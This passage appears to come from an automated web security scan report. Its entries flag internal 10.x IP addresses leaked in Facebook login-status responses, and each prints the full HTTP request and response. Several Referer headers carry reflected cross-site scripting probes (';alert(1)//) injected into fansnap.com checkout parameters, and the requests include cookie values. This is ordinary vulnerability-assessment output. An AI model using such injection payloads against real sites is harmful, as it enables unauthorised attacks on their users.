parent.postMessage("cb=f3b1ce1fd&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff661fbb9c&relation=parent&transport=postmessage&frame=f39002db7", "http:\/\/
...[SNIP]...

24.193. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.89.41

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.89.41
X-Cnection: close
Date: Tue, 19 Jul 2011 18:31:25 GMT
Content-Length: 0

24.194. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.250.50

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.250.50
X-Cnection: close
Date: Tue, 19 Jul 2011 18:31:15 GMT
Content-Length: 0

24.195. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.216.41

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df35b9a58314b95c%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff22f9e9b374e2e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3346ee4876c972%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff22f9e9b374e2e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35bf96bc227ade%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8d49a072d0574%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff22f9e9b374e2e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35bf96bc227ade&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df358bc356cb439a%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff22f9e9b374e2e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35bf96bc227ade&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df49cf977973f6a%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff22f9e9b374e2e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35bf96bc227ade&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.216.41
X-Cnection: close
Date: Tue, 19 Jul 2011 18:43:44 GMT
Content-Length: 261

<script type="text/javascript">
parent.postMessage("cb=f358bc356cb439a&origin=http\u00253A\u00252F\u00252Fwww.fansnap.com\u00252Ff22f9e9b374e2e&relation=parent&transport=postmessage&frame=f35bf96bc227
...[SNIP]...

24.196. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.191.63

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d961068c%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ffff71269%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df913adbd%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ffff71269%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df180469bac%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6bfe024c%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ffff71269%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df180469bac&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e322acf4%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ffff71269%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df180469bac&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1650bc3d8%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ffff71269%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df180469bac&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=44bca'%3balert(1)//30702b33e3b&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.191.63
X-Cnection: close
Date: Tue, 19 Jul 2011 19:37:13 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f2e322acf4&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ffff71269&relation=parent&transport=postmessage&frame=f180469bac", "http:\/\
...[SNIP]...

24.197. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.196.51

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c66a7b7d84e7a%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e913c7b336fc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfff006a01b356%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e913c7b336fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb38258b47c1e4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37d67ef5620c6%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e913c7b336fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb38258b47c1e4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20a730148e3ed8%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e913c7b336fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb38258b47c1e4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b43c07a5038ba%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e913c7b336fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb38258b47c1e4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A38966945f62%27%3balert(1)//460f48c4516
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.196.51
X-Cnection: close
Date: Tue, 19 Jul 2011 19:37:47 GMT
Content-Length: 262

<script type="text/javascript">
parent.postMessage("cb=f20a730148e3ed8&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff2e913c7b336fc&relation=parent&transport=postmessage&frame=fb38258b47c
...[SNIP]...

24.198. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.152.43

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11485e925850a%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff15fe570c4f19c8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e4c7e6a1f331e%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff15fe570c4f19c8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3cc4a3b9d3dc2a%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ca9fc5d7e2dc8%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff15fe570c4f19c8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3cc4a3b9d3dc2a&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df373cd6f2fb9756%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff15fe570c4f19c8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3cc4a3b9d3dc2a&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36f751e3ef111c%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff15fe570c4f19c8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3cc4a3b9d3dc2a&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=44bca%27%3balert(1)//30702b33e3b&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.152.43
X-Cnection: close
Date: Tue, 19 Jul 2011 19:37:29 GMT
Content-Length: 265

<script type="text/javascript">
parent.postMessage("cb=f373cd6f2fb9756&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff15fe570c4f19c8&relation=parent&transport=postmessage&frame=f3cc4a3b9d
...[SNIP]...

24.199. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.218.26

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3636742f%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff259da1a14%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11c2df44c%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff259da1a14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa923967c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb1a0ff0%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff259da1a14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa923967c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33a0a9f18%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff259da1a14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa923967c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b17a373%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff259da1a14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa923967c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.218.26
X-Cnection: close
Date: Tue, 19 Jul 2011 18:35:29 GMT
Content-Length: 244

<script type="text/javascript">
parent.postMessage("cb=f33a0a9f18&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff259da1a14&relation=parent&transport=postmessage&frame=fa923967c", "http:\/
...[SNIP]...

24.200. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.198.46

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ff5f0e8b134de%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff2c50e859711ee2%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13a4b58fd61a38%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff2c50e859711ee2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12e0dae317b412%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df29f18889d922fc%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff2c50e859711ee2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12e0dae317b412&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb666067bb7aa2%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff2c50e859711ee2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12e0dae317b412&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df347958d5b2f7c4%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff2c50e859711ee2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12e0dae317b412&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.198.46
X-Cnection: close
Date: Tue, 19 Jul 2011 19:34:10 GMT
Content-Length: 262

<script type="text/javascript">
parent.postMessage("cb=fb666067bb7aa2&origin=http\u00253A\u00252F\u00252Fwww.fansnap.com\u00252Ff2c50e859711ee2&relation=parent&transport=postmessage&frame=f12e0dae317b
...[SNIP]...

24.201. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.108.37

Request

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_998904&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.108.37
X-Cnection: close
Date: Tue, 19 Jul 2011 23:37:22 GMT
Content-Length: 0

24.202. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.237.60

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df355c92d185f2a%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff12660bcec2dd78%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b559618d0162a%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff12660bcec2dd78%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5793fe4f74f1c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e6015153540ba%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff12660bcec2dd78%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5793fe4f74f1c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c4862873084c8%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff12660bcec2dd78%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5793fe4f74f1c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df231c46154e53%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff12660bcec2dd78%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5793fe4f74f1c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/about
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.237.60
X-Cnection: close
Date: Tue, 19 Jul 2011 18:44:01 GMT
Content-Length: 262

<script type="text/javascript">
parent.postMessage("cb=f3c4862873084c8&origin=http\u00253A\u00252F\u00252Fwww.fansnap.com\u00252Ff12660bcec2dd78&relation=parent&transport=postmessage&frame=f5793fe4f74
...[SNIP]...

24.203. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.159.32

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1686338d38dfbc%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff3e57b37faf9558%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe2236ec097996%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff3e57b37faf9558%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2aeb7d36dc397a%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f2f3167aea19%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff3e57b37faf9558%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2aeb7d36dc397a&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df161fabdc7d8a1e%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff3e57b37faf9558%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2aeb7d36dc397a&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d91c710287fe%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff3e57b37faf9558%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2aeb7d36dc397a&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=44bca%27%3balert(1)//30702b33e3b&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
